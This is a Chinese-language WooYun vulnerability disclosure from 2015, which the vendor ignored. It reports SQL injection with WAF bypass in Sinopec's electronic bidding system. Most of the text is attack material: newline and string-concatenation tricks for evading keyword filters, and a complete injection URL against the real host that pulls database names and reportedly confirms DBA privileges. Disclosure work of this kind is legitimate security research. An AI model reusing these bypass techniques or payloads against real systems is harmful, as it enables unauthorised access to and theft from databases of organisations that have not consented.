漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中石化某系统存在DBA权限注入漏洞(绕过WAF注入)
详细说明:
中石化电子招标系统存在注入漏洞
该系统用来发布招标公告、通知、中标候选人公示、中标结果公告等重要信息。
该系统有WAF,但是规则过滤不严格 可以突破规则进行注入
参数keyword过滤不严格,其中过滤了() select from等等关键字
绕过方法:
对于select等关键字可以在其前面加%0a绕过
对于() 应该是正则匹配成对括号然后过滤,可以多构造一个( ,绕过比如
(';exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')--
对于其他关键字的绕过 直接在exec里面 用字符拼接绕过,比如这里的from :
exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')
漏洞证明:
报数据库名
http://eb.sinopec.com//TPWeb/Showinfo/SearchResult.aspx?keyword=%28%27;exec%28%27select%0A1%0Awhere%0A1=%28select%0Aname%0Afr%27%2b%27om%0Amas%27%2b%27ter.d%27%2b%27bo.sysd%27%2b%27atabases+where+dbid=1%29%27%29--&searchtype=1
user_name:
判断是否为系统权限:
返回空白表示条件为假,有信息返回表示为系统权限
判断是否有数据库管理权限
返回真
修复方案:
完善WAF过滤规则
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-07 17:56
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无





